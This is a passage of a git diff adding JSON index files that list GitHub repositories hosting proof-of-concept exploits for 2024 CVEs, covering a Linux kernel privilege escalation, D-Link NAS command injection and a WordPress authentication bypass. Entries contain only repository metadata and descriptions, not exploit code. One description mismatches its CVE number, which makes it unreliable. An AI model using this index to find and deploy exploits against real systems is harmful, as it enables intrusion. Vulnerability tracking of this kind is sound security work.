"https:\/\/github.com\/MAHajian\/CVE-2024-10793", + "description": null, + "fork": false, + "created_at": "2024-12-19T15:50:53Z", + "updated_at": "2024-12-19T16:38:19Z", + "pushed_at": "2024-12-19T16:38:15Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-1086.json b/2024/CVE-2024-1086.json new file mode 100644 index 0000000000..384c04478f --- /dev/null +++ b/2024/CVE-2024-1086.json @@ -0,0 +1,225 @@ +[ + { + "id": 775151369, + "name": "CVE-2024-1086", + "full_name": "Notselwyn\/CVE-2024-1086", + "owner": { + "login": "Notselwyn", + "id": 68616630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/68616630?v=4", + "html_url": "https:\/\/github.com\/Notselwyn", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Notselwyn\/CVE-2024-1086", + "description": "Universal local privilege escalation Proof-of-Concept exploit for CVE-2024-1086, working on most Linux kernels between v5.14 and v6.6, including Debian, Ubuntu, and KernelCTF. The success rate is 99.4% in KernelCTF images.", + "fork": false, + "created_at": "2024-03-20T21:16:41Z", + "updated_at": "2025-01-06T08:02:56Z", + "pushed_at": "2024-04-17T16:09:54Z", + "stargazers_count": 2322, + "watchers_count": 2322, + "has_discussions": false, + "forks_count": 300, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve", + "cve-2024-1086", + "exploit", + "lpe", + "poc" + ], + "visibility": "public", + "forks": 300, + "watchers": 2322, + "score": 0, + "subscribers_count": 27 + }, + { + "id": 781477717, + "name": "docker-POC_CVE-2024-1086", + "full_name": "Alicey0719\/docker-POC_CVE-2024-1086", + "owner": { + "login": "Alicey0719", + "id": 54524362, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/54524362?v=4", + "html_url": "https:\/\/github.com\/Alicey0719", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Alicey0719\/docker-POC_CVE-2024-1086", + "description": null, + "fork": false, + "created_at": "2024-04-03T13:09:22Z", + "updated_at": "2024-06-18T07:54:41Z", + "pushed_at": "2024-05-19T06:51:46Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 794185753, + "name": "CVE-2024-1086", + "full_name": "CCIEVoice2009\/CVE-2024-1086", + "owner": { + "login": "CCIEVoice2009", + "id": 71173516, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71173516?v=4", + "html_url": "https:\/\/github.com\/CCIEVoice2009", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CCIEVoice2009\/CVE-2024-1086", + "description": null, + "fork": false, + "created_at": "2024-04-30T16:10:37Z", + "updated_at": "2024-04-30T16:13:05Z", + "pushed_at": "2024-04-30T16:13:00Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 810010339, + "name": "CVE-2024-1086-checker", + "full_name": "kevcooper\/CVE-2024-1086-checker", + "owner": { + "login": "kevcooper", + "id": 6468064, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6468064?v=4", + "html_url": "https:\/\/github.com\/kevcooper", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kevcooper\/CVE-2024-1086-checker", + "description": null, + "fork": false, + "created_at": "2024-06-03T22:04:03Z", + "updated_at": "2024-06-10T17:13:10Z", + "pushed_at": "2024-06-10T17:13:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 813156753, + "name": "CVE-2024-1086", + "full_name": "feely666\/CVE-2024-1086", + "owner": { + "login": "feely666", + "id": 35380145, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/35380145?v=4", + "html_url": "https:\/\/github.com\/feely666", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/feely666\/CVE-2024-1086", + "description": null, + "fork": false, + "created_at": "2024-06-10T15:19:39Z", + "updated_at": "2024-06-10T15:25:31Z", + "pushed_at": "2024-06-10T15:25:12Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 824093061, + "name": "CVE-2024-1086", + "full_name": "xzx482\/CVE-2024-1086", + "owner": { + "login": "xzx482", + "id": 46856523, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46856523?v=4", + "html_url": "https:\/\/github.com\/xzx482", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xzx482\/CVE-2024-1086", + "description": null, + "fork": false, + "created_at": "2024-07-04T10:51:35Z", + "updated_at": "2024-07-04T10:54:26Z", + "pushed_at": "2024-07-04T10:54:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 904336421, + "name": "CVE-2024-1086", + "full_name": "LLfam\/CVE-2024-1086", + "owner": { + "login": "LLfam", + "id": 43279891, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/43279891?v=4", + "html_url": "https:\/\/github.com\/LLfam", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/LLfam\/CVE-2024-1086", + "description": null, + "fork": false, + "created_at": "2024-12-16T17:33:13Z", + "updated_at": "2025-01-07T06:11:20Z", + "pushed_at": "2024-12-16T17:38:23Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 11, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-10914.json b/2024/CVE-2024-10914.json new file mode 100644 index 0000000000..67ab8be42d --- /dev/null +++ b/2024/CVE-2024-10914.json @@ -0,0 +1,331 @@ +[ + { + "id": 885936481, + "name": "CVE-2024-10914", + "full_name": "imnotcha0s\/CVE-2024-10914", + "owner": { + "login": "imnotcha0s", + "id": 64480742, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64480742?v=4", + "html_url": "https:\/\/github.com\/imnotcha0s", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/imnotcha0s\/CVE-2024-10914", + "description": "Exploit for cve-2024-10914: D-Link DNS-320, DNS-320LW, DNS-325, DNS-340L Version 1.00, Version 1.01.0914.2012, Version 1.01, Version 1.02, Version 1.08 Command Injection", + "fork": false, + "created_at": "2024-11-09T19:30:39Z", + "updated_at": "2024-11-27T14:57:29Z", + "pushed_at": "2024-11-09T19:31:42Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 11, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 886174538, + "name": "CVE-2024-10914", + "full_name": "verylazytech\/CVE-2024-10914", + "owner": { + "login": "verylazytech", + "id": 172168670, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/172168670?v=4", + "html_url": "https:\/\/github.com\/verylazytech", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/verylazytech\/CVE-2024-10914", + "description": "POC - CVE-2024–10914- Command Injection Vulnerability in `name` parameter for D-Link NAS", + "fork": false, + "created_at": "2024-11-10T12:01:21Z", + "updated_at": "2024-12-30T21:06:51Z", + "pushed_at": "2024-11-27T08:26:29Z", + "stargazers_count": 42, + "watchers_count": 42, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-10914", + "d-link-nas", + "lfi", + "lfi-exploitation", + "poc", + "rce-exploit", + "unauthenticated-rce" + ], + "visibility": "public", + "forks": 12, + "watchers": 42, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 887759528, + "name": "CVE-2024-10914", + "full_name": "Egi08\/CVE-2024-10914", + "owner": { + "login": "Egi08", + "id": 60685799, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60685799?v=4", + "html_url": "https:\/\/github.com\/Egi08", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Egi08\/CVE-2024-10914", + "description": "CVE-2024-10914_Manual testing with burpsuite ", + "fork": false, + "created_at": "2024-11-13T08:33:16Z", + "updated_at": "2024-11-16T04:27:57Z", + "pushed_at": "2024-11-13T09:39:25Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 888892906, + "name": "D-Link-NAS-CVE-2024-10914-", + "full_name": "Bu0uCat\/D-Link-NAS-CVE-2024-10914-", + "owner": { + "login": "Bu0uCat", + "id": 169526025, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/169526025?v=4", + "html_url": "https:\/\/github.com\/Bu0uCat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Bu0uCat\/D-Link-NAS-CVE-2024-10914-", + "description": "这是一个D-Link rce漏洞 检测程序", + "fork": false, + "created_at": "2024-11-15T07:56:21Z", + "updated_at": "2024-11-15T07:59:44Z", + "pushed_at": "2024-11-15T07:59:36Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 889560261, + "name": "CVE-2024-10914", + "full_name": "ThemeHackers\/CVE-2024-10914", + "owner": { + "login": "ThemeHackers", + "id": 107047730, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/107047730?v=4", + "html_url": "https:\/\/github.com\/ThemeHackers", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/ThemeHackers\/CVE-2024-10914", + "description": "CVE-2024-10914 is a critical command injection vulnerability affecting several legacy D-Link Network Attached Storage (NAS) devices.", + "fork": false, + "created_at": "2024-11-16T16:32:05Z", + "updated_at": "2025-01-02T08:18:01Z", + "pushed_at": "2025-01-02T08:17:57Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 895213023, + "name": "cve-2024-10914-port", + "full_name": "retuci0\/cve-2024-10914-port", + "owner": { + "login": "retuci0", + "id": 165311393, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/165311393?v=4", + "html_url": "https:\/\/github.com\/retuci0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/retuci0\/cve-2024-10914-port", + "description": "dlink vulnerability thing in python and rust", + "fork": false, + "created_at": "2024-11-27T19:11:55Z", + "updated_at": "2024-11-27T19:12:49Z", + "pushed_at": "2024-11-27T19:12:45Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 895284938, + "name": "CVE-2024-10914-EXPLOIT", + "full_name": "K3ysTr0K3R\/CVE-2024-10914-EXPLOIT", + "owner": { + "login": "K3ysTr0K3R", + "id": 70909693, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/70909693?v=4", + "html_url": "https:\/\/github.com\/K3ysTr0K3R", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/K3ysTr0K3R\/CVE-2024-10914-EXPLOIT", + "description": "A PoC exploit for CVE-2024-10914 - D-Link Remote Code Execution (RCE)", + "fork": false, + "created_at": "2024-11-27T23:10:20Z", + "updated_at": "2024-11-27T23:33:14Z", + "pushed_at": "2024-11-27T23:31:07Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-10914", + "ethical-hacking", + "exploit", + "exploitation", + "hacking", + "proof-of-concept" + ], + "visibility": "public", + "forks": 2, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 898276056, + "name": "CVE-2024-10914-Exploit", + "full_name": "jahithoque\/CVE-2024-10914-Exploit", + "owner": { + "login": "jahithoque", + "id": 61009126, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/61009126?v=4", + "html_url": "https:\/\/github.com\/jahithoque", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jahithoque\/CVE-2024-10914-Exploit", + "description": "CVE-2024-10914 is a critical vulnerability affecting the D-Link DNS-320, DNS-320LW, DNS-325, and DNS-340L up to version 20241028. The function cgi_user_add in the file \/cgi-bin\/account_mgr.cgi?cmd=cgi_user_add is the culprit, allowing attackers to inject operating system commands remotely.", + "fork": false, + "created_at": "2024-12-04T05:27:36Z", + "updated_at": "2024-12-04T05:31:27Z", + "pushed_at": "2024-12-04T05:31:23Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 899673788, + "name": "D-Link", + "full_name": "redspy-sec\/D-Link", + "owner": { + "login": "redspy-sec", + "id": 142095788, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/142095788?v=4", + "html_url": "https:\/\/github.com\/redspy-sec", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/redspy-sec\/D-Link", + "description": "CVE-2024-10914 D-Link Remote Code Execution (RCE)", + "fork": false, + "created_at": "2024-12-06T19:03:34Z", + "updated_at": "2024-12-18T06:21:38Z", + "pushed_at": "2024-12-07T07:32:30Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024", + "poc", + "rce-exploit" + ], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 907765018, + "name": "CVE-2024-10914", + "full_name": "dragonXZH\/CVE-2024-10914", + "owner": { + "login": "dragonXZH", + "id": 191017577, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/191017577?v=4", + "html_url": "https:\/\/github.com\/dragonXZH", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dragonXZH\/CVE-2024-10914", + "description": "A PoC exploit for CVE-2024-10914 - D-Link Remote Code Execution (RCE)", + "fork": false, + "created_at": "2024-12-24T10:32:48Z", + "updated_at": "2024-12-24T10:42:23Z", + "pushed_at": "2024-12-24T10:42:20Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-10924.json b/2024/CVE-2024-10924.json new file mode 100644 index 0000000000..4584696f4f --- /dev/null +++ b/2024/CVE-2024-10924.json @@ -0,0 +1,308 @@ +[ + { + "id": 888592127, + "name": "CVE-2024-10924", + "full_name": "RandomRobbieBF\/CVE-2024-10924", + "owner": { + "login": "RandomRobbieBF", + "id": 51722811, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51722811?v=4", + "html_url": "https:\/\/github.com\/RandomRobbieBF", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/RandomRobbieBF\/CVE-2024-10924", + "description": " Really Simple Security (Free, Pro, and Pro Multisite) 9.0.0 – 9.1.1.1 – Authentication Bypass", + "fork": false, + "created_at": "2024-11-14T16:59:52Z", + "updated_at": "2024-12-12T13:40:41Z", + "pushed_at": "2024-11-14T17:00:59Z", + "stargazers_count": 4, + "watchers_count": 4, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 4, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 890585149, + "name": "wordpress-really-simple-security-authn-bypass-vulnerable-application", + "full_name": "m3ssap0\/wordpress-really-simple-security-authn-bypass-vulnerable-application", + "owner": { + "login": "m3ssap0", + "id": 705120, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/705120?v=4", + "html_url": "https:\/\/github.com\/m3ssap0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/m3ssap0\/wordpress-really-simple-security-authn-bypass-vulnerable-application", + "description": "WARNING: This is a vulnerable application to test the exploit for the Really Simple Security < 9.1.2 authentication bypass (CVE-2024-10924). Run it at your own risk!", + "fork": false, + "created_at": "2024-11-18T20:37:07Z", + "updated_at": "2024-11-25T19:14:25Z", + "pushed_at": "2024-11-19T12:19:36Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "authentication-bypass", + "cve-2024-10924", + "really-simple-security", + "vulnerable-application", + "wordpress" + ], + "visibility": "public", + "forks": 0, + "watchers": 7, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 890703149, + "name": "CVE-2024-10924", + "full_name": "MattJButler\/CVE-2024-10924", + "owner": { + "login": "MattJButler", + "id": 90148954, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/90148954?v=4", + "html_url": "https:\/\/github.com\/MattJButler", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/MattJButler\/CVE-2024-10924", + "description": "Simple Python script", + "fork": false, + "created_at": "2024-11-19T03:06:49Z", + "updated_at": "2024-11-19T03:08:57Z", + "pushed_at": "2024-11-19T03:08:53Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 890862229, + "name": "wordpress-really-simple-security-authn-bypass-exploit", + "full_name": "m3ssap0\/wordpress-really-simple-security-authn-bypass-exploit", + "owner": { + "login": "m3ssap0", + "id": 705120, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/705120?v=4", + "html_url": "https:\/\/github.com\/m3ssap0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/m3ssap0\/wordpress-really-simple-security-authn-bypass-exploit", + "description": "Exploits Really Simple Security < 9.1.2 authentication bypass (CVE-2024-10924).", + "fork": false, + "created_at": "2024-11-19T10:07:28Z", + "updated_at": "2025-01-05T19:08:18Z", + "pushed_at": "2024-11-19T12:20:16Z", + "stargazers_count": 18, + "watchers_count": 18, + "has_discussions": false, + "forks_count": 14, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2024-10924", + "exploit", + "really-simple-security", + "security", + "security-tools", + "vulnerability", + "vulnerability-scan", + "wordpress" + ], + "visibility": "public", + "forks": 14, + "watchers": 18, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 891621160, + "name": "CVE-2024-10924-Wordpress-Docker", + "full_name": "Trackflaw\/CVE-2024-10924-Wordpress-Docker", + "owner": { + "login": "Trackflaw", + "id": 78696986, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/78696986?v=4", + "html_url": "https:\/\/github.com\/Trackflaw", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Trackflaw\/CVE-2024-10924-Wordpress-Docker", + "description": "Vulnerable docker container for Really Simple Security (Free, Pro, and Pro Multisite) 9.0.0 – 9.1.1.1 – Authentication Bypass CVE-2023-50164", + "fork": false, + "created_at": "2024-11-20T16:50:24Z", + "updated_at": "2024-11-25T19:41:23Z", + "pushed_at": "2024-11-22T09:28:08Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 2, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 2, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 894993174, + "name": "CVE-2024-10924-PoC", + "full_name": "Maalfer\/CVE-2024-10924-PoC", + "owner": { + "login": "Maalfer", + "id": 96432001, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/96432001?v=4", + "html_url": "https:\/\/github.com\/Maalfer", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Maalfer\/CVE-2024-10924-PoC", + "description": "Bypass del MFA en WordPress con el plugin Really Simple Security instalado entre las versiones 9.0.0 – 9.1.1.1.", + "fork": false, + "created_at": "2024-11-27T11:19:47Z", + "updated_at": "2024-11-30T06:27:28Z", + "pushed_at": "2024-11-27T14:13:57Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 3, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 896883913, + "name": "CVE-2024-10924-Bypass-MFA-Wordpress-LAB", + "full_name": "D1se0\/CVE-2024-10924-Bypass-MFA-Wordpress-LAB", + "owner": { + "login": "D1se0", + "id": 164921056, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/164921056?v=4", + "html_url": "https:\/\/github.com\/D1se0", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/D1se0\/CVE-2024-10924-Bypass-MFA-Wordpress-LAB", + "description": null, + "fork": false, + "created_at": "2024-12-01T14:43:16Z", + "updated_at": "2024-12-04T11:29:31Z", + "pushed_at": "2024-12-02T08:32:47Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "bypass", + "bypass-mfa", + "bypass-wordpress", + "cibersecurity", + "cve", + "cve-2024-10924", + "exploit", + "hacking", + "hacking-etico", + "really-simple-security", + "wordpress" + ], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 897912004, + "name": "CVE-2024-10924-PoC", + "full_name": "Hunt3r850\/CVE-2024-10924-PoC", + "owner": { + "login": "Hunt3r850", + "id": 108004077, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108004077?v=4", + "html_url": "https:\/\/github.com\/Hunt3r850", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Hunt3r850\/CVE-2024-10924-PoC", + "description": null, + "fork": false, + "created_at": "2024-12-03T13:09:46Z", + "updated_at": "2024-12-03T13:13:07Z", + "pushed_at": "2024-12-03T13:10:44Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 897913649, + "name": "CVE-2024-10924-Wordpress-Docker", + "full_name": "Hunt3r850\/CVE-2024-10924-Wordpress-Docker", + "owner": { + "login": "Hunt3r850", + "id": 108004077, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/108004077?v=4", + "html_url": "https:\/\/github.com\/Hunt3r850", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Hunt3r850\/CVE-2024-10924-Wordpress-Docker", + "description": null, + "fork": false, + "created_at": "2024-12-03T13:12:58Z", + "updated_at": "2024-12-03T13:18:30Z", + "pushed_at": "2024-12-03T13:14:06Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-10958.json b/2024/CVE-2024-10958.json new file mode 100644 index 0000000000..0423b28798 --- /dev/null +++ b/2024/CVE-2024-10958.json @@ -0,0 +1,33 @@ +[ + { + "id": 886253464, + "name": "CVE-2024-10958-WPPA-Exploit", + "full_name": "reinh3rz\/CVE-2024-10958-WPPA-Exploit", + "owner": { + "login": "reinh3rz", + "id": 144375735, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144375735?v=4", + "html_url": "https:\/\/github.com\/reinh3rz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/reinh3rz\/CVE-2024-10958-WPPA-Exploit", + "description": null, + "fork": false, + "created_at": "2024-11-10T15:43:14Z", + "updated_at": "2024-11-11T11:53:02Z", + "pushed_at": "2024-11-10T16:41:57Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-11003.json b/2024/CVE-2024-11003.json new file mode 100644 index 0000000000..8713c63323 --- /dev/null +++ b/2024/CVE-2024-11003.json @@ -0,0 +1,33 @@ +[ + { + "id": 895398083, + "name": "CVE-2024-11003-PoC", + "full_name": "unknown-user-from\/CVE-2024-11003-PoC", + "owner": { + "login": "unknown-user-from", + "id": 51774599, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51774599?v=4", + "html_url": "https:\/\/github.com\/unknown-user-from", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/unknown-user-from\/CVE-2024-11003-PoC", + "description": "CVE-2024-11003 Perl Poc", + "fork": false, + "created_at": "2024-11-28T06:13:42Z", + "updated_at": "2024-11-28T06:22:35Z", + "pushed_at": "2024-11-28T06:22:32Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-1112.json b/2024/CVE-2024-1112.json new file mode 100644 index 0000000000..f42479b552 --- /dev/null +++ b/2024/CVE-2024-1112.json @@ -0,0 +1,33 @@ +[ + { + "id": 837931543, + "name": "CVE-2024-1112", + "full_name": "enessakircolak\/CVE-2024-1112", + "owner": { + "login": "enessakircolak", + "id": 69612461, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/69612461?v=4", + "html_url": "https:\/\/github.com\/enessakircolak", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/enessakircolak\/CVE-2024-1112", + "description": null, + "fork": false, + "created_at": "2024-08-04T13:26:46Z", + "updated_at": "2024-08-13T18:12:30Z", + "pushed_at": "2024-08-13T18:12:26Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-11199.json b/2024/CVE-2024-11199.json new file mode 100644 index 0000000000..045b020a18 --- /dev/null +++ b/2024/CVE-2024-11199.json @@ -0,0 +1,33 @@ +[ + { + "id": 893229030, + "name": "CVE-2024-11199", + "full_name": "windz3r0day\/CVE-2024-11199", + "owner": { + "login": "windz3r0day", + "id": 179751303, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/179751303?v=4", + "html_url": "https:\/\/github.com\/windz3r0day", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/windz3r0day\/CVE-2024-11199", + "description": "CVE-2024-11199 poc exploit", + "fork": false, + "created_at": "2024-11-23T21:43:20Z", + "updated_at": "2024-11-23T21:52:42Z", + "pushed_at": "2024-11-23T21:44:58Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 2, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2024/CVE-2024-11201.json b/2024/CVE-2024-11201.json new file mode 100644 index 0000000000..e030eab4f6 --- /dev/null +++ b/2024/CVE-2024-11201.json @@ -0,0 +1,33 @@ +[ + { + "id": 892997604, + "name": "CVE-2024-11201", + "full_name": "NSQAQ\/CVE-2024-11201", + "owner": { + "login": "NSQAQ", + "id": 41403864, + 